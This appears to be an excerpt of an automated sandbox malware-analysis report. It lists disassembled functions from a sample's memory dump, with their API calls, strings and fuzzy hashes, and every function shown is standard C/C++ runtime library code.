Function 0050532A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,005052E3), ref: 00505339
GetLastError.KERNEL32(?,005052E3), ref: 00505343
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00505381

Strings

api-ms-, xrefs: 00505350
ext-ms-, xrefs: 00505366

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 403c3e7f8e275fa0a7c5c729af97c0bcd974a0018141051b3c73567ec019f81a
Instruction ID: c47b9f578e2bcf5bec8ca801c4a0ca3e65d3f6a4f01096781ec437173bcdd2c0
Opcode Fuzzy Hash: 403c3e7f8e275fa0a7c5c729af97c0bcd974a0018141051b3c73567ec019f81a
Instruction Fuzzy Hash: 7AF01272745345BAEF242E61ED0BB7E3E55BF51B80F144420FA0CE80E1EBA5D925D984

Function 004D3804 Relevance: 7.7, APIs: 5, Instructions: 178COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 004D386F
operator+.LIBVCRUNTIME ref: 004D38BF
shared_ptr.LIBCMT ref: 004D398B
DName::DName.LIBVCRUNTIME ref: 004D39BB
operator+.LIBVCRUNTIME ref: 004D3A1C

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: operator+shared_ptr$NameName::
String ID:
API String ID: 2894330373-0
Opcode ID: 900b45479e4a62fe38e8972c32697a29390c9a607ce5c57f2b8f3ba8efefa997
Instruction ID: cb816098c1e9889fbb3dacf8ca4edc598f5f31052e7a87ac04718ba5bd26853b
Opcode Fuzzy Hash: 900b45479e4a62fe38e8972c32697a29390c9a607ce5c57f2b8f3ba8efefa997
Instruction Fuzzy Hash: 4B61A0B1804209AFDB14DF65C869ABE7BB5FB05305F04816BF40997311D3799B09DF4A

Function 004A5B49 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004A5B50
std::_Lockit::_Lockit.LIBCPMT ref: 004A5B5B
std::_Lockit::~_Lockit.LIBCPMT ref: 004A5BC9

Part of subcall function 004A5CDC: std::locale::_Locimp::_Locimp.LIBCPMT ref: 004A5CF4

std::locale::_Setgloballocale.LIBCPMT ref: 004A5B76
_Yarn.LIBCPMT ref: 004A5B8C

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: cd0d7e7dab6e39062b24e9eca6bb2255bce5497885e1a34d426b1a09cb99e59d
Instruction ID: b18b9651be85327cd077ccd3e984421999f1081ddccbb750ae008fa2c727c370
Opcode Fuzzy Hash: cd0d7e7dab6e39062b24e9eca6bb2255bce5497885e1a34d426b1a09cb99e59d
Instruction Fuzzy Hash: 9B01D47A6006108BD705EB20DA5697D7BA5FFA6754B18000EE80257381DF3C6E46DF99

Function 004B4F9C Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B4FA3
std::_Lockit::_Lockit.LIBCPMT ref: 004B4FAD
int.LIBCPMT ref: 004B4FC4

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Lockit::~_Lockit.LIBCPMT ref: 004B501E

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 32ed0cf5f936243fdb88fd5b995841229a4ca31280210f830b130f8c37af5d16
Instruction ID: 0899becb6b379174604f105f151f2d65e248939565874b4985cdfa2ee2128ee5
Opcode Fuzzy Hash: 32ed0cf5f936243fdb88fd5b995841229a4ca31280210f830b130f8c37af5d16
Instruction Fuzzy Hash: 31F0F63A8006059BDB00FB619812BFE7230AF50765F14040FF5006B2D2EF3C9F048B99

Function 004B5031 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B5038
std::_Lockit::_Lockit.LIBCPMT ref: 004B5042
int.LIBCPMT ref: 004B5059

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Lockit::~_Lockit.LIBCPMT ref: 004B50B3

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 6505498eadeaac2c3177693e5bbe764ce74f33f98fc8dbc4d8d424cb86eecf46
Instruction ID: 244a86080a3f364d808e5c176ba40aafcdf2d8f0f07a84cac0d14a1cc694543f
Opcode Fuzzy Hash: 6505498eadeaac2c3177693e5bbe764ce74f33f98fc8dbc4d8d424cb86eecf46
Instruction Fuzzy Hash: EAF06D7A8006059BDB05FBA58856BEE6324AF61769F54040EF5106B2D2EF3C9A088B99

Function 004B50C6 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B50CD
std::_Lockit::_Lockit.LIBCPMT ref: 004B50D7
int.LIBCPMT ref: 004B50EE

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Lockit::~_Lockit.LIBCPMT ref: 004B5148

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 3526c6e57cbecf671d328147971b50fcbde733cad50515fbd06e752c205b13dd
Instruction ID: 2ae5582c792801936d4798a48c70ca5df9bc02c38826c252ea5a36681e44edff
Opcode Fuzzy Hash: 3526c6e57cbecf671d328147971b50fcbde733cad50515fbd06e752c205b13dd
Instruction Fuzzy Hash: 53F0963AC0051997CB04EB659852BEE7774AF61725F14054FF9106B2D2EF3C9E048798

Function 004B515B Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B5162
std::_Lockit::_Lockit.LIBCPMT ref: 004B516C
int.LIBCPMT ref: 004B5183

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

std::_Lockit::~_Lockit.LIBCPMT ref: 004B51DD

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 953bc59c3a80f670020655709d0d4f3f1bb2b375f880b4e9f25170447789923e
Instruction ID: 0a8e20f1533dc5905e1db4d0b3c815854efdc4b08781cb1a3310285f34d9deeb
Opcode Fuzzy Hash: 953bc59c3a80f670020655709d0d4f3f1bb2b375f880b4e9f25170447789923e
Instruction Fuzzy Hash: 66F0903AC006099BCB05EBA59856BFE7324AF64769F14040FF9106B2D2EF3C9E058B59

Function 004B51F0 Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B51F7
std::_Lockit::_Lockit.LIBCPMT ref: 004B5201
int.LIBCPMT ref: 004B5218

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

moneypunct.LIBCPMT ref: 004B523B
std::_Lockit::~_Lockit.LIBCPMT ref: 004B5272

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3moneypunct
String ID:
API String ID: 3160146232-0
Opcode ID: fb20aec2581c829217f024d1c27feeb3fe89c8c730ef3691d10c739c666b074c
Instruction ID: 11192212246494686865ca1a5c7a6521a475e4b666210e16055ac4c80dbc3c6c
Opcode Fuzzy Hash: fb20aec2581c829217f024d1c27feeb3fe89c8c730ef3691d10c739c666b074c
Instruction Fuzzy Hash: FCF05E7AD0160997CF01FF91C912BEEB634AF60759F14045EB5006B282EF7C9E048B99

Function 004FC14F Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 004FC2CF
__freea.LIBCMT ref: 004FC2EB

Strings

am/pm, xrefs: 004FC34F
a/p, xrefs: 004FC3B3

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: f7fb2eac6116f241f3ff23cf28e8c91282ebc2b8ecf9c8549ab3e802b9772a37
Instruction ID: c219f42a7e949160d7edf43aa728c27d750d50bcb167b991d84c26c83f2d3b48
Opcode Fuzzy Hash: f7fb2eac6116f241f3ff23cf28e8c91282ebc2b8ecf9c8549ab3e802b9772a37
Instruction Fuzzy Hash: 1BC1D33590022EDADB24CFA8C6D96BB77B0FF45700F14404BEA01AB345D739AD41DB5A

Function 004D3A52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBVCRUNTIME ref: 004D3AB5
DName::operator+.LIBCMT ref: 004D3B73
operator+.LIBVCRUNTIME ref: 004D3BB2

Strings

LcR, xrefs: 004D3B89

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: operator+$Name::operator+
String ID: LcR
API String ID: 1198235884-1299490058
Opcode ID: 16bb55133171749fd852791f58409c404aa595e2c624b4efa0f663ab16774b5a
Instruction ID: 4d71e2b6c4ead462323ee123d7c519cb1569b75cb6e5e2d4608195dc072fc3b9
Opcode Fuzzy Hash: 16bb55133171749fd852791f58409c404aa595e2c624b4efa0f663ab16774b5a
Instruction Fuzzy Hash: A3419D71900208EFEF14CF40D829BAE7BF5AF0130AF04805BE5155B392D779AA48CF8A

Function 004D20C5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 004D20F2
DName::operator+.LIBCMT ref: 004D213F
DName::DName.LIBVCRUNTIME ref: 004D21B5

Strings

WM, xrefs: 004D20C5

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: NameName::$Name::operator+
String ID: WM
API String ID: 826178784-430334498
Opcode ID: 499cec0a9c5b9fa0ea4e4878732ade96c13cfff60bfa0783f03c2c395e773f7a
Instruction ID: a1a8553df9a3efb92bb6f68303def2c0756e0841b427853dea847cc557d969ca
Opcode Fuzzy Hash: 499cec0a9c5b9fa0ea4e4878732ade96c13cfff60bfa0783f03c2c395e773f7a
Instruction Fuzzy Hash: 58312534908244AEDB08DFA4C661AEDBBB1AF25300F10C09FE50667352DB795E4FDB19

Function 004C4C16 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C4C1D
_Mpunct.LIBCPMT ref: 004C4CAA
_Mpunct.LIBCPMT ref: 004C4CC4

Strings

$+xv, xrefs: 004C4CCF

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: 2c57488f65c7650fe83f805e0fd79ed21453762e5ccaf84514951a064f6a0e11
Instruction ID: 0021ce97e5761410e3e4a7eb84de651cbeac1fa05f1ba198132be3ccbcbeccd4
Opcode Fuzzy Hash: 2c57488f65c7650fe83f805e0fd79ed21453762e5ccaf84514951a064f6a0e11
Instruction Fuzzy Hash: 4021AEB5904B566ED761DF768890B7BBFE8AB08304F04095FE499C7A42D738EA01CB94

Function 004B9D92 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B9D99

Part of subcall function 004B1D0B: _Maklocstr.LIBCPMT ref: 004B1D2B
Part of subcall function 004B1D0B: _Maklocstr.LIBCPMT ref: 004B1D48
Part of subcall function 004B1D0B: _Maklocstr.LIBCPMT ref: 004B1D65

_Mpunct.LIBCPMT ref: 004B9E26
_Mpunct.LIBCPMT ref: 004B9E40

Strings

$+xv, xrefs: 004B9E4B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Maklocstr$Mpunct$H_prolog3
String ID: $+xv
API String ID: 4259326447-1686923651
Opcode ID: 91bf78987403bfe0b5c2f1c10fbad60630bcacfc2f40e6238b3337c6dbd2f39d
Instruction ID: c2dda8324a839b2611978aae1de9ca1bfac643697fd4429b023182a011bcdf88
Opcode Fuzzy Hash: 91bf78987403bfe0b5c2f1c10fbad60630bcacfc2f40e6238b3337c6dbd2f39d
Instruction Fuzzy Hash: 7A21D1B1804A516FD721DF75C880B7BBEF8AB08300F04095FE599C7A41D738EA11CBA4

Function 004A8A05 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004A8A0C

Strings

false, xrefs: 004A8A63
true, xrefs: 004A8A76
04R, xrefs: 004A8A40

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3_
String ID: 04R$false$true
API String ID: 2427045233-642619426
Opcode ID: 76644e893a8836ad83f6d239f556c26adf18225555eae4fc4cff316238288427
Instruction ID: 16bc156538df66746bd09445b01673f091f0dbf32fc4e48bed9386a9620c344f
Opcode Fuzzy Hash: 76644e893a8836ad83f6d239f556c26adf18225555eae4fc4cff316238288427
Instruction Fuzzy Hash: 2311B1759047449ECB25EFB5D841A8ABBE4BF16304F04896FE1A58B381EB34A904CB64

Function 004A3309 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004A3310
std::_Lockit::_Lockit.LIBCPMT ref: 004A331D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004A335A

Part of subcall function 004A5C47: _Yarn.LIBCPMT ref: 004A5C66
Part of subcall function 004A5C47: _Yarn.LIBCPMT ref: 004A5C8A

Strings

bad locale name, xrefs: 004A336B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: 16a0c1f46321a02b7cf85cd5437945fe2c8a40d7cece75ac9f63a6659e9a9987
Instruction ID: ccfc262d9a03b6e119c08fdd6a59db068fae3ecf17a9b20615b2e443a33a5ffb
Opcode Fuzzy Hash: 16a0c1f46321a02b7cf85cd5437945fe2c8a40d7cece75ac9f63a6659e9a9987
Instruction Fuzzy Hash: C601C071504B549FCB219F6A944158BFFE0BF2A350B40896FE58D87A02C734A600CB9D

Function 004D6056 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,004D5F53,00000000,00000001,0055BD6C,?,?,?,004D61AA,00000004,InitializeCriticalSectionEx,0052661C,InitializeCriticalSectionEx), ref: 004D6063
GetLastError.KERNEL32(?,004D5F53,00000000,00000001,0055BD6C,?,?,?,004D61AA,00000004,InitializeCriticalSectionEx,0052661C,InitializeCriticalSectionEx,00000000,?,004CEC9D), ref: 004D606D
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,004CD663), ref: 004D6095

Strings

api-ms-, xrefs: 004D607A

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: c99336a436a5b6ff1d44fa32235a2a6630c85c11137ead702207c790045a1ee9
Instruction ID: 342d8c635b92d13d51670983df9acf8796bb39ba960e0b20be7aad10f5636abe
Opcode Fuzzy Hash: c99336a436a5b6ff1d44fa32235a2a6630c85c11137ead702207c790045a1ee9
Instruction Fuzzy Hash: 1AE04831780344B7DF311F61ED17F597F55AF12B40F144022FA0CA81E1DB65A929D588

Function 004FFCDE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000002,YnM,004FFCD8,YnM,004D6E59,?,00000002,9496FA04,004D6E59,00000002), ref: 004FFCEF
TerminateProcess.KERNEL32(00000000), ref: 004FFCF6
ExitProcess.KERNEL32 ref: 004FFD08

Strings

YnM, xrefs: 004FFCE0

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: YnM
API String ID: 1703294689-1866446633
Opcode ID: 335f47846243c9c4f75ff36ef4311061623431cc51e98a1d738038b0cc9e410b
Instruction ID: 715f54ef17cc61fd4bedf2f464c39ec75986869d01480042b46669da98adfdbe
Opcode Fuzzy Hash: 335f47846243c9c4f75ff36ef4311061623431cc51e98a1d738038b0cc9e410b
Instruction Fuzzy Hash: E0D05E3110010CBFCF113F61DC0D8593F29AF01340B008021BA0A4A131CF3E9A5FEAA4

